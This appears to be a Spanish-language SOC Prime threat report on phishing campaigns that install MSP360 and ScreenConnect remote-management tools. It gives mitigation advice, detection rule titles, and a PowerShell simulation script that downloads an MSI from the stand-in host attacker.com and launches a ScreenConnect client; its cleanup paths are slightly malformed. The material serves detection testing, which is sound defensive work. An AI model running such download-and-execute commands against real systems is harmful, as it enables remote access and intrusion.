SOC Prime Bias: High

01 Oct 2026 08:13 UTC

El phishing abusa de herramientas RMM para acceso persistente

Author Photo
SOC Prime Team linkedin icon Seguir
El phishing abusa de herramientas RMM para acceso persistente
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Los actores de amenazas están aprovechando campañas de phishing para entregar un instalador legítimo de MSP360 RMM disfrazado como software de confianza. Una vez lanzado, el instalador establece persistencia y, posteriormente, descarga e implementa ConnectWise ScreenConnect, proporcionando a los atacantes un canal adicional de acceso remoto. Esto permite actividades posteriores al compromiso, incluyendo el robo de credenciales y la recopilación de datos sensibles.

Investigación

Los expertos de Microsoft Defender identificaron múltiples señuelos de phishing que se hacían pasar por Zoom, Adobe e invitaciones a reuniones legítimas para distribuir MSP360 v2.5.0.67. Los investigadores reconstruyeron la cadena de infección, rastreando la ejecución inicial del usuario y la elevación de UAC mediante la instalación de servicios y el despliegue de herramientas RMM secundarias. La investigación también reveló que los atacantes abusan de plataformas en la nube de confianza, incluyendo Amazon S3 y Dropbox, para alojar cargas maliciosas.

Mitigación

Las organizaciones deberían controlar estrictamente las herramientas RMM aprobadas aplicando MFA e implementando políticas de Control de Aplicaciones para prevenir instalaciones no autorizadas. Las reglas de bloqueo basadas en certificados pueden restringir aún más aplicaciones específicas firmadas. Fortalecer las defensas de los endpoints mediante protección antivirus en la nube y reglas de Reducción de Superficie de Ataque es también esencial para reducir la exposición.

Respuesta

Cuando se descubran instalaciones no autorizadas de RMM, los equipos de seguridad deben restablecer inmediatamente las credenciales asociadas con las instalaciones de servicios afectados. La sospecha de compromiso de cuentas a nivel de sistema requiere una investigación exhaustiva para determinar el alcance total del ataque. Revisar los registros de detección de endpoints para identificar sesiones de gestión remota sospechosas y actividades relacionadas posteriores al compromiso.

Flujo de Ataque

Todavía estamos actualizando esta parte.

Detecciones

Descarga o Subida a través de Powershell (vía cmdline)

Equipo SOC Prime
30 Sep 2026

Ejecución de Cambio Inusual de Código de Página (vía cmdline)

Equipo SOC Prime
30 Sep 2026

Software Alternativo de Acceso/Administración Remota (vía process_creation)

Equipo SOC Prime
30 Sep 2026

Llamar Métodos Sospechosos de .NET desde Powershell (vía powershell)

Equipo SOC Prime
30 Sep 2026

Comando y Control Sospechoso por Solicitud de Dominio de Nivel Superior (TLD) Inusual DNS (vía dns)

Equipo SOC Prime
30 Sep 2026

IOCs (HashSha256) para detectar: El Phishing Abusa de Herramientas RMM para Acceso Persistente

Reglas AI de SOC Prime
30 Sep 2026

IOCs (HashSha1) para detectar: El Phishing Abusa de Herramientas RMM para Acceso Persistente

Reglas AI de SOC Prime
30 Sep 2026

Detectar PowerShell Invoke-WebRequest para Descarga de Paquete MSI Remoto [Windows Powershell]

Reglas AI de SOC Prime
30 Sep 2026

El Phishing Abusa de Herramientas RMM para Acceso Persistente [Windows Process Creation]

Reglas AI de SOC Prime
30 Sep 2026

Ejecución de Simulación

  • Narrativa del Ataque & Comandos: Un adversario inicia una campaña de spearphishing. La víctima hace clic en un enlace que desencadena un comando PowerShell de una sola línea. Este comando usa Invoke-WebRequest para descargar ClientSetup.msi (simulando el instalador de ScreenConnect) desde un servidor remoto. Una vez descargado, el atacante ejecuta el MSI, y el paso final de la simulación implica lanzar ScreenConnect.WindowsClient.exe para imitar la sesión de acceso remoto establecida. Esta secuencia está diseñada para activar la selección_2 Y selección_3 lógica de la regla.

  • Script de Prueba de Regresión:

    # Simulación de Despliegue RMM basado en Phishing
    $tempDir = $env:TEMP
    $msiName = "ClientSetup.msi"
    $exeName = "ScreenConnect.WindowsClient.exe"
    $msiPath = Join-Path $tempDir $msiName
    $exePath = Join-Path $tempDir $exeName
    
    # 1. Simular la Descarga de PowerShell (Parte A de la Selección 2)
    Write-Host "[+] Simulando descarga de MSI..."
    # Usando un archivo ficticio para simular la descarga del MSI
    New-Item -Path $msiPath -ItemType File -Force
    
    # Este comando coincide con la lógica de 'Invoke-WebRequest' y 'ClientSetup.msi'
    powershell.exe -Command "Invoke-WebRequest -Uri 'http://attacker.com/ClientSetup.msi' -OutFile '$msiPath'"
    
    # 2. Crear un ejecutable ficticio para simular el cliente de ScreenConnect (Selección 3)
    Write-Host "[+] Creando ejecutable ficticio de ScreenConnect..."
    New-Item -Path $exePath -ItemType File -Force
    
    # 3. Ejecutar el cliente (Selección 3 y finalización de la Selección 2)
    Write-Host "[+] Ejecutando Cliente ScreenConnect..."
    Start-Process -FilePath $exePath
  • Comandos de Limpieza:

    # Limpiar artefactos de la simulación
    Remove-Item -Path "$env:TEMPClientSetup.msi" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPScreenConnect.WindowsClient.exe" -Force -ErrorAction SilentlyContinue
    Write-Host "[+] Limpieza completa."